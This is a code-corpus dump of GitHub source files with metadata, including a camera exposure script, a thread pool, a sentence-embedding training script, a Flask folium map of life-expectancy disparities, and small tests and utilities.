"attribute"}, {"api_name": "rest_framework.status", "line_number": 161, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 165, 
"usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_410_GONE", "line_number": 166, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 166, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 173, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 175, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 154, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 82, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 82, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 183, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.objects.get", "line_number": 185, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.objects", "line_number": 185, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 185, "usage_type": "name"}, {"api_name": "bikesharing.models.LocationTracker.DoesNotExist", "line_number": 186, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 186, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 187, "usage_type": "call"}, {"api_name": "serializers.LocationTrackerUpdateSerializer", "line_number": 189, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 191, "usage_type": "call"}, {"api_name": "bikesharing.models.Location", "line_number": 201, "usage_type": "call"}, {"api_name": "bikesharing.models.Location.Source", "line_number": 202, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 202, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 203, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 205, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 215, "usage_type": "call"}, {"api_name": "preferences.preferences.BikeSharePreferences", "line_number": 220, "usage_type": "attribute"}, {"api_name": "preferences.preferences", "line_number": 220, "usage_type": "name"}, {"api_name": "bikesharing.models.Station.objects.filter", "line_number": 221, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.objects", "line_number": 221, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 221, "usage_type": "name"}, {"api_name": "django.contrib.gis.measure.D", "line_number": 222, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.Status", "line_number": 223, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 223, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 232, "usage_type": "call"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 232, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.Status", "line_number": 237, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 237, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.create_unless_time", "line_number": 239, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 239, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.State", "line_number": 243, "usage_type": "attribute"}, {"api_name": 
"bikesharing.models.Bike", "line_number": 243, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.create_unless_time", "line_number": 245, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 245, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 253, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 255, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 178, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 179, "usage_type": "call"}, {"api_name": "rest_framework_api_key.permissions.HasAPIKey", "line_number": 179, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ViewSet", "line_number": 262, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 262, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.objects.filter", "line_number": 265, "usage_type": "call"}, {"api_name": "bikesharing.models.Bike.objects", "line_number": 265, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 265, "usage_type": "name"}, {"api_name": "serializers.MaintenanceBikeSerializer", "line_number": 266, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 267, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 263, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 269, "usage_type": "call"}, {"api_name": "rest_framework.decorators.authentication_classes", "line_number": 258, "usage_type": "call"}, {"api_name": "rest_framework.authentication.SessionAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "rest_framework.authentication.TokenAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "authentication.BasicTokenAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 261, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 261, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveAPIView", "line_number": 275, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 275, "usage_type": "name"}, {"api_name": "serializers.UserDetailsSerializer", "line_number": 282, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 283, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 283, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 291, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 296, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 296, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 297, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 297, "usage_type": "name"}, {"api_name": "serializers.SocialAppSerializer", "line_number": 301, "usage_type": "name"}, {"api_name": "allauth.socialaccount.models.SocialApp.objects.filter", "line_number": 304, "usage_type": "call"}, {"api_name": "allauth.socialaccount.models.SocialApp.objects", "line_number": 304, "usage_type": "attribute"}, {"api_name": "allauth.socialaccount.models.SocialApp", "line_number": 304, 
"usage_type": "name"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 304, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 294, "usage_type": "call"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 294, "usage_type": "name"}, {"api_name": "django.utils.feedgenerator.Rss201rev2Feed", "line_number": 307, "usage_type": "name"}, {"api_name": "django.utils.feedgenerator.Rss201rev2Feed", "line_number": 309, "usage_type": "argument"}, {"api_name": "django.contrib.syndication.views.Feed", "line_number": 352, "usage_type": "name"}, {"api_name": "preferences.preferences.BikeSharePreferences", "line_number": 356, "usage_type": "attribute"}, {"api_name": "preferences.preferences", "line_number": 356, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 362, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry._meta", "line_number": 364, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 364, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.objects.order_by", "line_number": 368, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 368, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 368, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 373, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 398, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects.order_by", "line_number": 406, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 406, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 406, "usage_type": "name"}, {"api_name": "rest_framework.views.exception_handler", "line_number": 410, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.APIException", "line_number": 415, "usage_type": "attribute"}, {"api_name": "rest_framework.exceptions", "line_number": 415, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 442, "usage_type": "call"}]}
+{"seq_id": "15514557452", "text": "import cv2 #Highly overkill I think\nfrom vimba import *\nfrom time import sleep\nimport numpy as np\nfrom PIL import Image \n\ndef take_image(cam_id, f_name): #Takes a singular picture with chosen camera and saves it as \".jpg\"\n with vimba.get_camera_by_id(cam_id) as cam:\n frame = cam.get_frame()\n frame.convert_pixel_format(PixelFormat.Mono8) #This sets the camera to use Mono8 (8-bit image [monochrome?])\n cv2.imwrite (f'{f_name}.jpg ', frame.as_opencv_image()) #Just a ludacrious way of storing the image? Seems like it\n #Ok, now lets assume this then just saves an image as a jpg\n\ndef find_exposure_time(initial_guess, cam_id): #Figures out the optimal exposure time, sets the camera to it and returns it\n exposure_time = initial_guess\n max_pixel = 256 #Just an initial value to make the while loop start\n img_name = 'for_exp_time'\n print('start')\n with vimba.get_camera_by_id(cam_id) as cam:\n increment = cam.ExposureTime.get_increment()\n while(np.abs(max_pixel-230) > 20): #Somewhat quick changes to get a fairly good exposure time\n if(max_pixel < 230): exposure_time = exposure_time + ((exposure_time*0.1)//increment)*increment #Increases exposure time ~10% but ensures that it is done in a whole number of increments\n elif(max_pixel > 230): exposure_time = exposure_time - ((exposure_time*0.1)//increment)*increment #Same as above, just lowering this time\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n print(f'rough time found: {exposure_time}')\n\n if(max_pixel < 230): #Slow and incremental changes to exposure time, so we can find the optimal one\n tmp_max_pixel = max_pixel + 1\n while(tmp_max_pixel > max_pixel and tmp_max_pixel <= 230):\n exposure_time += 1\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n exposure_time -= 1\n elif(max_pixel > 230):\n tmp_max_pixel = max_pixel - 1\n while(max_pixel > 230 and tmp_max_pixel >= 230):\n exposure_time -= 1\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n exposure_time += 1\n print(f'Optimal time found: {exposure_time}')\n cam.ExposureTime.set(exposure_time)\n return(exposure_time)\n\n\ndef main():\n with Vimba.get_instance() as vimba:\n front_camera_id = 'djlefakjlkjd' #The IDs are just placeholders as I do not know the actual IDs\n top_camera_id = 'klajsflsaj'\n\n for i in range(10): #just to check that nothing fucked happens (within a minute at least).\n print(f'test {i}: front camera is {front_camera} and top camera is {top_camera}')\n sleep(6)\n take_image(front_camera, 'test') #Takes a test image with the front camera\n\nif __name__ == '__main__':\n main()\n", "repo_name": "CThyness/Nanophotonics_II", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 3288, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vimba.get_camera_by_id", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 11, "usage_type": "call"}, {"api_name": "vimba.get_camera_by_id", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 26, 
"usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 46, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}]}
+{"seq_id": "19653485599", "text": "import os\nfrom unittest import mock\n\nimport numpy as np\nimport pytest\n\n\ndef test_add_coastlines_help():\n from polar2grid.add_coastlines import main\n\n with pytest.raises(SystemExit) as e:\n main([\"--help\"])\n assert e.value.code == 0\n\n\ndef _create_fake_l_geotiff(fp):\n import rasterio\n\n kwargs = {\n \"driver\": \"GTiff\",\n \"height\": 1000,\n \"width\": 500,\n \"count\": 1,\n \"dtype\": np.uint8,\n \"crs\": \"+proj=latlong\",\n \"transform\": (0.033, 0.0, 0.0, 0.0, 0.033, 0.0),\n }\n with rasterio.open(fp, \"w\", **kwargs) as ds:\n ds.write(np.zeros((500, 1000), dtype=np.uint8), 1)\n\n\n@mock.patch(\"polar2grid.add_coastlines.ContourWriterAGG.add_overlay_from_dict\")\ndef test_add_coastlines_basic_l(add_overlay_mock, tmp_path):\n from polar2grid.add_coastlines import main\n\n fp = str(tmp_path / \"test.tif\")\n _create_fake_l_geotiff(fp)\n ret = main([\"--add-coastlines\", \"--add-colorbar\", fp])\n assert ret in [None, 0]\n assert os.path.isfile(tmp_path / \"test.png\")\n add_overlay_mock.assert_called_once()\n assert \"coasts\" in add_overlay_mock.call_args.args[0]\n", "repo_name": "cloudsillusions/polar2grid", "sub_path": "polar2grid/tests/test_add_coastlines.py", "file_name": "test_add_coastlines.py", "file_ext": "py", "file_size_in_byte": 1134, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.raises", "line_number": 11, "usage_type": "call"}, {"api_name": "polar2grid.add_coastlines.main", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 24, "usage_type": "attribute"}, {"api_name": "rasterio.open", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 29, "usage_type": "attribute"}, {"api_name": "polar2grid.add_coastlines.main", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 32, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "39270921333", "text": "import threading\nfrom collections.abc import Callable\nfrom queue import Queue, Empty\nfrom typing import NamedTuple, Any\n\n\nclass QueueItem(NamedTuple):\n func: Callable\n arg: Any\n\n\nclass ThreadPool:\n def __init__(self, num_threads: int):\n self.input: Queue[QueueItem] = Queue()\n self.output = Queue()\n self.running = True\n self.input_count = 0\n self.processing_count = 0\n self.output_count = 0\n self.count_lock = threading.Lock()\n\n self.threads = [threading.Thread(target=self.consumer) for _ in range(num_threads)]\n for t in self.threads:\n t.start()\n\n def __repr__(self):\n return f'ThreadPool(input_count={self.input_count}, processing_count={self.processing_count}, output_count={self.output_count})'\n\n def __len__(self):\n with self.count_lock:\n return self.input_count + self.processing_count + self.output_count\n\n def __iter__(self):\n while len(self) > 0 and self.running:\n try:\n out = self.output.get(block=True, timeout=1)\n self.output.task_done()\n with self.count_lock:\n self.output_count -= 1\n yield out\n except Empty:\n pass\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.join()\n\n def join(self):\n self.input.join()\n self.running = False\n for t in self.threads:\n t.join()\n\n def add_item(self, func, arg):\n self.input.put(QueueItem(func, arg))\n with self.count_lock:\n self.input_count += 1\n\n def get_item(self):\n out = self.output.get()\n self.output.task_done()\n with self.count_lock:\n self.output_count -= 1\n return out\n\n def consumer(self):\n while self.running:\n try:\n item = self.input.get(block=True, timeout=1)\n with self.count_lock:\n self.input_count -= 1\n self.processing_count += 1\n self.output.put(item.func(item.arg))\n self.input.task_done()\n with self.count_lock:\n self.processing_count -= 1\n self.output_count += 1\n except Empty:\n pass\n", "repo_name": "KathrynPanger/bbd", "sub_path": "src/bbd/github_data_extractor/threadpool.py", "file_name": "threadpool.py", "file_ext": "py", "file_size_in_byte": 2360, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 7, "usage_type": "name"}, {"api_name": "collections.abc.Callable", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 9, "usage_type": "name"}, {"api_name": "queue.Queue", "line_number": 14, "usage_type": "name"}, {"api_name": "queue.Queue", "line_number": 15, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 20, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 22, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 41, "usage_type": "name"}, {"api_name": "queue.Empty", "line_number": 80, "usage_type": "name"}]}
+{"seq_id": "73982554729", "text": "#\n# @lc app=leetcode id=2218 lang=python3\n#\n# [2218] Maximum Value of K Coins From Piles\n#\n\n# @lc code=start\nfrom functools import cache\nfrom typing import List\n\n\nclass Solution:\n def maxValueOfCoins(self, piles: List[List[int]], k: int) -> int:\n @cache\n def dp(i, coin_to_collect):\n '''\n @param:\n i : choose only the pile starting from i \n '''\n if i == len(piles) or coin_to_collect == 0:\n return 0\n ret, curr = dp(i+1, coin_to_collect), 0\n\n for _i, x in enumerate(piles[i]):\n if coin_to_collect-1-_i < 0:\n break\n curr += x\n ret = max(dp(i+1, coin_to_collect-(_i + 1)) + curr, ret)\n return ret\n return dp(0, k)\n\n# @lc code=end\n", "repo_name": "benntuecon/Leetcode-prac", "sub_path": "2218.maximum-value-of-k-coins-from-piles.py", "file_name": "2218.maximum-value-of-k-coins-from-piles.py", "file_ext": "py", "file_size_in_byte": 824, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "functools.cache", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "42185950529", "text": "import os\r\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\r\nimport sys\r\nsys.path.append(\"D:/Meredith/TaskB\")\r\nimport csv\r\nimport gzip\r\nimport xml.dom.minidom\r\nimport math\r\nfrom datetime import datetime\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom sklearn.metrics.pairwise import paired_cosine_distances\r\n# from datasets import load_dataset\r\nfrom transformers import AutoTokenizer,AutoModel,BertConfig,BertModel\r\nimport numpy as np\r\n\r\nfrom transformers.models.bert import BertTokenizer\r\nfrom transformers import AdamW,get_linear_schedule_with_warmup\r\n\r\n# from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator\r\nfrom typing import Union, Tuple, List, Iterable, Dict, Callable\r\nfrom data_CoSENT import load_ENdata,load_PTdata,CustomDataset,collate_fn,pad_to_maxlen\r\n\r\nfrom utils import evaluate,get_similarity,prepare_data,get_devSimilarity,write_csv,evaluate_submission,insert_to_submission1,writeList_csv,set_seed\r\nfrom torch import nn\r\n\r\n# from transformers import InputExample\r\nfrom torch.utils.data import Dataset\r\nimport random\r\nimport torch\r\nimport argparse\r\n\r\n#本部分来自https://github.com/shawroad/CoSENT_Pytorch\r\ndef calc_loss(y_true,y_pred):\r\n #取出真实标签\r\n y_true=y_true[::2]\r\n #对输出的句子向量进行l2归一化 后面只需要对应位相乘就可以得到cos值\r\n norms=(y_pred**2).sum(axis=1,keepdims=True)**0.5\r\n y_pred=y_pred/norms\r\n #奇偶向量相乘\r\n y_pred=torch.sum(y_pred[::2]*y_pred[1::2],dim=1)*20\r\n y_1=y_pred[:,None]\r\n y_2=y_pred[None,:]\r\n y_pred=y_1-y_2#两两之间的余弦差值\r\n #矩阵中的第i行第j列 表示的是第i个余弦值-第j个余弦值\r\n y_true=y_true[:,None] load it and return its content\r\n if os.path.exists(cachefile):\r\n with open(cachefile, 'rb') as cachehandle:\r\n print(\"using cached result from '%s'\" % cachefile)\r\n return pickle.load(cachehandle)\r\n\r\n # execute the function with all arguments passed\r\n res = fn(*args, **kwargs)\r\n\r\n # write to cache file\r\n with open(cachefile, 'wb') as cachehandle:\r\n print(\"saving result to cache '%s'\" % cachefile)\r\n pickle.dump(res, cachehandle)\r\n\r\n return res\r\n\r\n return wrapped\r\n\r\n return decorator # return this \"customized\" decorator that uses \"cachefile\"\r\n\r\n@cached('tracts_disparity.pickle')\r\ndef load_data():\r\n lfe = pd.read_csv('data/US_A.CSV')[['Tract ID', 'e(0)']] \\\r\n .rename(index=str, \r\n columns={'Tract ID': 'GEOID', \r\n 'e(0)':'life_expectancy'})\r\n lfe['GEOID'] = lfe['GEOID'].astype(str)\r\n gdf = gpd.read_file('data/geo/tracts/usa_tracts.shp')[['GEOID','geometry']]\r\n gdf = gdf.merge(lfe).set_index('GEOID')\r\n\r\n swm = ps.weights.Rook.from_dataframe(gdf)\r\n tract_to_neighbors = swm.neighbors\r\n\r\n fips_to_lfe = dict(zip(lfe['GEOID'].astype(str), lfe['life_expectancy']))\r\n\r\n g = nx.Graph()\r\n g.add_nodes_from(gdf.index)\r\n\r\n for tract, neighbors in tract_to_neighbors.items():\r\n avail_tracts = fips_to_lfe.keys()\r\n # some tracts don't seem to show up in the life expectancy dataset\r\n # these may be tracts with no population\r\n if tract in avail_tracts:\r\n for neighbor in neighbors:\r\n if neighbor in avail_tracts:\r\n tract_lfe = fips_to_lfe[tract]\r\n neighbor_lfe = fips_to_lfe[neighbor]\r\n disparity = abs(tract_lfe - neighbor_lfe)\r\n g.add_edge(tract, neighbor, disparity=disparity)\r\n # remove the node from the graph if the node is not in the life\r\n # expectancy dataset\r\n elif tract in g.nodes:\r\n g.remove_node(tract)\r\n\r\n sorted_list = sorted(g.edges(data=True), key=lambda x: x[2]['disparity'], 
reverse=True)\r\n\r\n return lfe, sorted_list, gdf\r\n\r\n\r\nlife_expectancy = Blueprint('life_expectancy', __name__, template_folder='templates')\r\n\r\n@life_expectancy.route('/folium')\r\n# read config file and return json to the client!\r\ndef get_map():\r\n limit = request.args.get('limit')\r\n lfe, sorted_list, gdf = load_data()\r\n\r\n top_50 = sorted_list[:int(limit)]\r\n top_50_tracts = []\r\n for t in top_50:\r\n if t[0] not in top_50_tracts:\r\n top_50_tracts.append(t[0])\r\n if t[1] not in top_50_tracts:\r\n top_50_tracts.append(t[1])\r\n\r\n \r\n top_50_tracts_gdf = gdf[gdf.index.isin(top_50_tracts)].reset_index()[['GEOID', 'geometry', 'life_expectancy']]\r\n top_50_tracts_gdf.to_file('selected_tracts.geojson', driver='GeoJSON')\r\n\r\n\r\n m = folium.Map(tiles='cartodbpositron', min_zoom=4, zoom_start=4.25, \r\n max_bounds=True,location=[33.8283459,-98.5794797],\r\n min_lat=5.499550, min_lon=-160.276413, \r\n max_lat=83.162102, max_lon=-52.233040)\r\n marker_cluster = MarkerCluster(\r\n options = {'maxClusterRadius':15, \r\n 'disableCusteringAtZoom':5, \r\n 'singleMarkerMode':True}).add_to(m)\r\n folium.Choropleth(\r\n geo_data = 'selected_tracts.geojson',\r\n data = lfe,\r\n columns = ['GEOID','life_expectancy'],\r\n fill_color = 'YlGn',\r\n key_on = 'feature.properties.GEOID',\r\n name = 'geojson',\r\n legend_name='Life Expectancy'\r\n ).add_to(m)\r\n\r\n for i, tract in top_50_tracts_gdf.iterrows():\r\n x = tract.geometry.centroid.x\r\n y = tract.geometry.centroid.y\r\n l = tract.life_expectancy\r\n folium.CircleMarker([y, x], radius=8, color='black', \r\n fill_color='white', fill_opacity=0.5, \r\n tooltip='Life expectancy: {}'.format(str(l))).add_to(marker_cluster)\r\n \r\n f = folium.Figure()\r\n title = 'Does your census tract determine how ' + \\\r\n 'long you will live? '\r\n subtitle = 'Census tract neighbors across ' + \\\r\n 'the U.S. 
with the widest disparities ' + \\\r\n 'in life expectancy '\r\n f.html.add_child(folium.Element(title))\r\n f.html.add_child(folium.Element(subtitle))\r\n f.add_child(m)\r\n\r\n # not sure if this works\r\n # data = {'html': f.html}\r\n # if it does not, you can save the file and read it as text\r\n f.save(\"map.html\")\r\n file = open(\"map.html\", \"r\") \r\n data = {'html': file.read()}\r\n \r\n return jsonify(data)\r\n", "repo_name": "pramod-thaz/xls_manager", "sub_path": "services/analytics/life_expectancy.py", "file_name": "life_expectancy.py", "file_ext": "py", "file_size_in_byte": 5372, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 44, "usage_type": "call"}, {"api_name": "pysal.weights.Rook.from_dataframe", "line_number": 47, "usage_type": "call"}, {"api_name": "pysal.weights", "line_number": 47, "usage_type": "attribute"}, {"api_name": "networkx.Graph", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.Blueprint", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "folium.Map", "line_number": 97, "usage_type": "call"}, {"api_name": "folium.plugins.MarkerCluster", "line_number": 101, "usage_type": "call"}, {"api_name": "folium.Choropleth", "line_number": 105, "usage_type": "call"}, {"api_name": "folium.CircleMarker", "line_number": 119, "usage_type": "call"}, {"api_name": "folium.Figure", "line_number": 123, "usage_type": "call"}, {"api_name": "folium.Element", "line_number": 129, "usage_type": "call"}, {"api_name": "folium.Element", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 140, "usage_type": "call"}]}
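The pickle-backed @cached decorator shown above is a small memoizer keyed by a fixed filename, which is why load_data() only pays the shapefile-and-graph cost on the first request. One caveat worth stating: the cache file ignores the call arguments, so it only suits zero-argument loaders like load_data. A hedged usage sketch with an invented function:

@cached("expensive.pickle")
def expensive():
    print("computing...")
    return sum(i * i for i in range(1_000_000))


first = expensive()   # computes, then writes expensive.pickle
second = expensive()  # prints "using cached result from 'expensive.pickle'"
assert first == second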
+{"seq_id": "38197084093", "text": "\nfrom rest_framework.serializers import ModelSerializer\n\nfrom positions.models import PositionPing\n\nclass PositionPingSerializer(ModelSerializer):\n class Meta:\n model = PositionPing\n fields = [\n 'latitude', 'longitude', 'altitude', \n 'accuracy', 'altitude_accuracy', 'heading', \n 'speed', 'timestamp', 'logged_at'\n ]\n", "repo_name": "thedejijoseph/touchdown", "sub_path": "positions/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 374, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "name"}, {"api_name": "positions.models.PositionPing", "line_number": 8, "usage_type": "name"}]}
+{"seq_id": "27364467545", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pkg import *\nplt.figure(figsize=(8,6))\ngrade = ('before 2010','2010','2011','2012')\nx_pos = np.arange(len(grade))\nperformance = [4.59,23.85,32.11,39.45]\n\nret = plt.bar(x_pos,performance,0.35,color='b',align='center',alpha=0.8)\nplt.xticks(x_pos,grade)\nplt.ylabel('percentage (%)')\nplt.title('The percentage of grade')\nautolabel(ret)\nplt.show()\n", "repo_name": "daozl/james", "sub_path": "code/bar/grade.py", "file_name": "grade.py", "file_ext": "py", "file_size_in_byte": 446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]}
